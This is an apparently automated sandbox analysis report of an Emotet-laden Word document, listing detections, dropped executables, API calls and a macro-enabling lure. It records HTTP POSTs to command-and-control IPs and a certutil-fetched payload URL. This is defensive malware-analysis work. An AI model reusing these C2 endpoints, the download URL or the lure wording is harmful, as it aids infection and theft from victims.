Analysis Report sample1.bin

Overview

General Information

Sample Name: sample1.bin (renamed file extension from bin to doc)
Analysis ID: 425356
MD5: 7dbd8ecfada1d39a81a58c9468b91039
SHA1: 0d21e2742204d1f98f6fcabe0544570fd6857dd3
SHA256: dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates and opens a fake document (probably a fake document to hide exploiting)
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: sample1.doc Avira: detected
Antivirus detection for dropped file
Source: C:\Users\Public\Ksh1.pdf Avira: detection malicious, Label: TR/Casdet.xqfgu
Found malware configuration
Source: 10.2.mmcshext.exe.688500.3.raw.unpack Malware Configuration Extractor: Emotet
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Ksh1.pdf Metadefender: Detection: 40%
Source: C:\Users\Public\Ksh1.pdf ReversingLabs: Detection: 66%
Multi AV Scanner detection for submitted file
Source: sample1.doc Virustotal: Detection: 57%
Source: sample1.doc Metadefender: Detection: 45%
Source: sample1.doc ReversingLabs: Detection: 68%
Machine Learning detection for dropped file
Source: C:\Users\Public\Ksh1.pdf Joe Sandbox ML: detected
Machine Learning detection for sample
Source: sample1.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.1.TSChannel.exe.39a0000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.dhcpcmonitor.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 14.0.TSChannel.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 10.0.mmcshext.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 8.0.tmp_e473b4.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 10.1.mmcshext.exe.3980000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 12.1.dhcpcmonitor.exe.39e0000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 13.0.adsmsext.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 11.1.ir50_qcx.exe.3980000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 9.1.normaliz.exe.3a10000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 15.0.qdvd.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 9.0.normaliz.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 11.0.ir50_qcx.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao
Source: 8.1.tmp_e473b4.exe.39b0000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 13.1.adsmsext.exe.2ca0000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 14.1.TSChannel.exe.39a0000.2.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.msvcp120_clr0400.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.fao

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree, 16_2_004725E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00472230 CryptEncrypt,memcpy,CryptGetHashParam,CryptDestroyHash,CryptDuplicateHash,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 16_2_00472230
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00471FC0 CryptDestroyHash,CryptDuplicateHash,memcpy, 16_2_00471FC0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00471FD8 CryptDestroyHash, 16_2_00471FD8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 16_2_004738F0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 4x nop then push ebp 8_2_0041FA20
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 177.130.51.198:80

Networking:

C2 URLs / IPs found in malware configuration
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 38
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.121.87.90:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.131.144.215
Source: Joe Sandbox View IP Address: 143.95.101.72
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View ASN Name: SURF-IDPTSurfindoNetworkID
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  POST /43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 177.130.51.198/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=-------------------fZX6grGG67bSvix2bq9
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 177.130.51.198
  Content-Length: 4452
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /KFDwQljVkxD3/OOFcmzcP5LKdqC/7kx60YXntHFlDt/5Rmtlx5Mir4E2nTGMFj/vs6RDbQfHrygTYrI/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 91.121.87.90/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------------F6CkwVxliFrUl7pi
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 91.121.87.90:8080
  Content-Length: 4452
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52B8A12-B174-499E-B3BD-E7523F18DF93}.tmp
Source: unknown HTTP traffic detected:
  POST /43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 177.130.51.198/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=-------------------fZX6grGG67bSvix2bq9
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 177.130.51.198
  Content-Length: 4452
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/plain; charset=utf-8
  X-Content-Type-Options: nosniff
  Date: Wed, 26 May 2021 22:19:07 GMT
  Content-Length: 19
  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
  Data Ascii: 404 page not found
Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2274808207.0000000002F70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp String found in binary or memory: https://pornthash.mobi/videos/tayna_tung
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp String found in binary or memory: https://pornthash.mobi/videos/tayna_tung%temp%/tmp_e473b4.exex

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000A.00000003.2260910791.0000000000688000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2274679265.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2269436388.0000000000331000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2289663022.00000000005B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2274011391.00000000004F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2260946472.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2330396700.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2278477954.0000000000574000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2330617776.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2265106835.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2289619290.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2269524139.0000000000504000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2265408389.0000000000548000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2273841914.00000000002F6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2265371977.0000000000686000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2279155029.00000000002B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2255546226.0000000000641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2284287661.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2282904583.0000000000274000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2286207050.0000000001C61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2256075266.0000000000658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2255733615.0000000000926000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2278304115.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2269934201.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2261089149.0000000000614000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2289418364.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2251551044.0000000000928000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.3.adsmsext.exe.5b8ab8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.mmcshext.exe.688500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.adsmsext.exe.5b8ab8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.msvcp120_clr0400.exe.2f8598.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tmp_e473b4.exe.9285b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.tmp_e473b4.exe.9285b8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.adsmsext.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.normaliz.exe.658540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.msvcp120_clr0400.exe.2f8598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.mmcshext.exe.688500.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ir50_qcx.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.ir50_qcx.exe.548548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.adsmsext.exe.5b8ab8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.dhcpcmonitor.exe.2f8560.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.tmp_e473b4.exe.9285b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ir50_qcx.exe.548548.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.normaliz.exe.658540.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.msvcp120_clr0400.exe.2f8598.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ir50_qcx.exe.548548.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.qdvd.exe.5b8518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tmp_e473b4.exe.640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.normaliz.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.adsmsext.exe.5b8ab8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tmp_e473b4.exe.9285b8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.dhcpcmonitor.exe.2f8560.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.qdvd.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.qdvd.exe.5b8518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.qdvd.exe.5b8518.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.TSChannel.exe.1c60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.dhcpcmonitor.exe.2f8560.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.mmcshext.exe.688500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.qdvd.exe.5b8518.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.ir50_qcx.exe.548548.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.dhcpcmonitor.exe.2f8560.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.mmcshext.exe.688500.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.mmcshext.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.normaliz.exe.658540.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.dhcpcmonitor.exe.4f0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.msvcp120_clr0400.exe.470000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.normaliz.exe.658540.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.msvcp120_clr0400.exe.2f8598.0.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree, 16_2_004725E0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" from the yellow bar above. QNN q 2 Once you have enabled editing, please click
Source: Screenshot number: 4 Screenshot OCR: Enable content" on the yellow bar above. Em> "this document is completely safety to open Page: 1 o
Source: Document image extraction number: 0 Screenshot OCR: Enable editing' from the yellow bar 2 Once you have enabled editing, please click "Enable content'
Source: Document image extraction number: 0 Screenshot OCR: Enable content' on the yellow bar above. *this document is completely safety to open
Document contains an embedded VBA macro with suspicious strings
Source: sample1.doc OLE, VBA macro line: Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
Source: sample1.doc OLE, VBA macro line: Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00620400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 8_2_00620400
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 9_2_003E0400
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_00360400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 10_2_00360400
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_00320400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 11_2_00320400
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 12_2_004E0400
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_00280400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 13_2_00280400
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C10400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 14_2_01C10400
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 15_2_003E0400
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00460400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory, 16_2_00460400
Contains functionality to delete services
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F8E80 CloseServiceHandle,OpenSCManagerW,DeleteService,OpenServiceW,OpenServiceW,CloseServiceHandle, 9_2_003F8E80
Creates files inside the system directory
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer69EA.tmp
Deletes files inside the Windows folder
Source: C:\Windows\System32\certutil.exe File deleted: C:\Windows\cer69EA.tmp
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040314D 8_2_0040314D
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004052D4 8_2_004052D4
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00409350 8_2_00409350
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00406DA8 8_2_00406DA8
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_006478B0 8_2_006478B0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00641C70 8_2_00641C70
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_006465E0 8_2_006465E0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F1C70 9_2_003F1C70
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F78B0 9_2_003F78B0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F65E0 9_2_003F65E0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F1C70 10_2_003F1C70
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F78B0 10_2_003F78B0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F65E0 10_2_003F65E0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_00331C70 11_2_00331C70
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_003378B0 11_2_003378B0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_003365E0 11_2_003365E0
